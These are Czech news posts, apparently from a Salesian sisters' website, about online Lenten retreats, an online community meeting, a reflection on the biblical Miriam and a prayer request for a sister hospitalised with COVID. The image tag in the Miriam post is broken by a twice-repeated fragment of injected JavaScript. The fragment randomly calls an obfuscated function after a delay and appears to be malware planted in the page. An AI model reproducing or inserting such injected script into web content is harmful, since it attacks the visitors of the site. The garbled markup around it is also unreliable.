Duchovní obnova on-line

Duchovní obnova on-line

Nabízíme další duchovní obnovu, tentokrát pro dívky ve věku 15 – 19 let.

Více informací najdete na plakátku.

Setkání CEL (jak jinak než) ONLINE

Setkání CEL (jak jinak než) ONLINE

V sobotu 6.3. se konalo zkrácené setkání všech českých salesiánek. Původně mělo být celý víkend a naživo v Hradci Králové, ale bohužel covidová situace nám to neumožnila. Takže jsme byly vděčné za možnost vidět se alespoň v sobotu online. Technika občas zlobila, ale není všem dnům konec, můžeme se něčemu novému do budoucna naučit. Tématem setkání mělo být hodnocení OPI, takového projektu, který jsme si jako Inspektorie vyrobily, jehož cíle a výzvy se snažíme žít a tak naplňovat charisma, jímž máme sloužit. Nicméně tento úkol byl z online důvodů trochu odsunut. Dopoledne jsme tedy měly možnost každá sestra promluvit na kameru a zreflektovat covidový rok – co nám dal a co nám vzal. Odpoledne se naší online konference zúčastnili čtyři laici – pracovníci v salesiánských dílech. Dva pracují v Praze Kobylisích a dva v Pardubicích. Četlo se i sdílení jedné paní učitelky, která učí na CSŠJB v Karlíně. Hosté odpovídali na rozličné otázky, které byly předem položeny, i které jsme jim my sestry kladly během rozhovoru. Ten se týkal toho, jak my vnímáme laiky v našich dílech, jak oni nás jako komunitu, jako zasvěcené osoby, jaké mohou nastávat třecí plochy, co jedni od druhých očekávají, po čem touží, jak se navzájem potřebujeme… Z debaty jsme odcházeli všichni obohaceni a děkujeme hostům za čas, který nám věnovali. Setkání jsme zakončily krátkým zamyšlením nad naší pastorací v ČR a adorací, tentokrát už ne online, ale každá komunita u sebe v kapli. Děkujeme přípravnému týmu, který to neměl jednoduché, jelikož díky karanténám a opatřením vysílala každá sestra ze svého pokoje. Radujeme se z toho, že jsme se mohly zase po čase všechny sestry vidět a v modlitbě myslíme na naši sestru Mary, která je v těžkém stavu v nemocnici.

3. postní týden – MIRIAM

3. postní týden – MIRIAM

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and_Moses_painting.jpg”>andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and_Moses_painting.jpg” alt=”” width=”209″ height=”322″>

A máme zde třetí postní týden a třetí biblickou ženu. Tentokrát je to Miriam – židovská žena, která nás zve k chvále a vděčnosti Hospodinu i přes nepřízeň, kterou prožívá ve svém životě. Je to pro dnešní dobu dost aktuální téma.

Podnět si pro nás připravila sr. Eva Liškutinová, FMA, která je v současné době v komunitě v Brně Žabovřeskách.

Prosíme o modlitbu za sestru Mary

Prosíme o modlitbu za sestru Mary

Milí přátelé,

chceme vás poprosit o modlitbu za naší spolusestru Marii (Mary) Mráčkovou, která patří do komunity Praha Karlín. Mary je v současné době je s COVIDem hospitalizována na oddělení ARO. Její stav je vážný.

Spojujeme se v modlitbě (nejen) ke Staříčkovi, tak kdo byste se chtěl přidat, tak zde najdete modlitbu.

Děkujeme.

sestry salesiánky

karlínská komunita sester salesiánek

Report z online DO

Report z online DO

K postní době patří tradičně nabídka duchovních obnov. Letos se nemohou konat prezenčně, proto většina z nich přechází na formu online. Tak to je i s našimi obnovami, které pořádáme. Možná na našich stránkách vidíte letáčky, ve kterých je nabízíme. Nyní je čas podat zprávu, jak se tyto obnovy ujaly. Samozřejmě vše je viděno z lidského vnějšího hlediska, co Bůh koná v srdcích účastníků, uvidíme až na věčnosti…

O Duchovní obnově pro mládež poreferuje sestra Zdeňka: ” V pátek a v sobotu 26. a 27. února proběhla duchovní obnova pro mládež (18-30 let). Základnu poskytla kobyliská komunita, kde jsme byly společně “v trojici” sestry Helena, Jana a Zdeňka, a jedenáct mladých lidí na různých místech naší země. Obvykle k obnovám patří, že člověk na chvíli opustí své prostředí, svůj pracovní stůl… tentokrát si všichni účastníci statečně vytvořili prostor k setkání s Bohem i s druhými ve svých domovech. Téma obnovy bylo: “To je můj milovaný Syn…” Páteční večer jsme se po krátkém seznámení a uvedení do modlitby s Božím Slovem, společně pomodlili křížovou cestu. A v sobotu nás provázel úryvek z Markova evangelia o Ježíšově proměnění na hoře. Přemýšleli jsme o tom, komu nasloucháme, jakou moc nad námi mají slova a jak poznávat, který “hlas” komu patří. V druhé přednášce jsme se “dívali” na Boží Slovo napsané na tři ikony – Ježíšův křest, Proměnění a Ukřižování a rozjímali o tom, co říká Otec Ježíši (i nám) – “ty jsi můj milovaný…” a jaká je Ježíšova odpověď Otci – “Otče, do tvých rukou odevzdávám…” Odpoledne byl pak prostor pro osobní doprovázení a zamyšlení nad tím, jakou představu vlastně máme o Bohu a jak snadno může být nějak pokřivena. Zakončili jsme sdílením a společnou diskuzí. Myslím, že i přes všechny těžkosti, které současná situace klade setkávání, se nám podařilo vytvořit krásné společenství modlitby a sdílení a podpořit a povzbudit se v našem putování postní dobou k radostné oslavě Vzkříšení.”

O druhé obnově pro holky puberťačky ze Sebranické farnosti poreferuje sestra Zuzka: “Tradičně i tento rok jsme (Verča, Jana a Zuzka) plánovaly postní DO  ve spolupráci s místní komunitou SDB pro holky v Sebranicích. Kvůli státním koronavirovým omezením jsme ji zkusily nabídnout formou on-line. Přihlášených 7 holek z druhého stupně ZŠ se aktivně zapojilo do naší nabídky. Zamýšlely jsme se nad tématem emocí v našem živote a pomáhaly nám k tomu ukázky z filmu V hlavě.  Každou emoci jsme propojily s konkrétním Božím slovem a ukázaly jsme si, jak ji prožíval Ježíš, jak ji můžeme dobře prožívat a zpracovat, protože emoce jsou součástí našeho každodenního života. Technika přes naše obavy fungovala skvěle (i náš přípravný tým díky různým karanténám vysílal každý se svého vlastního pokoje), a tak děkujeme Pánu, že nám dal odvahu první online duchovní obnovu zorganizovat. A i když už víme, jak na to, přesto bychom rády řekly: A příště naživo…”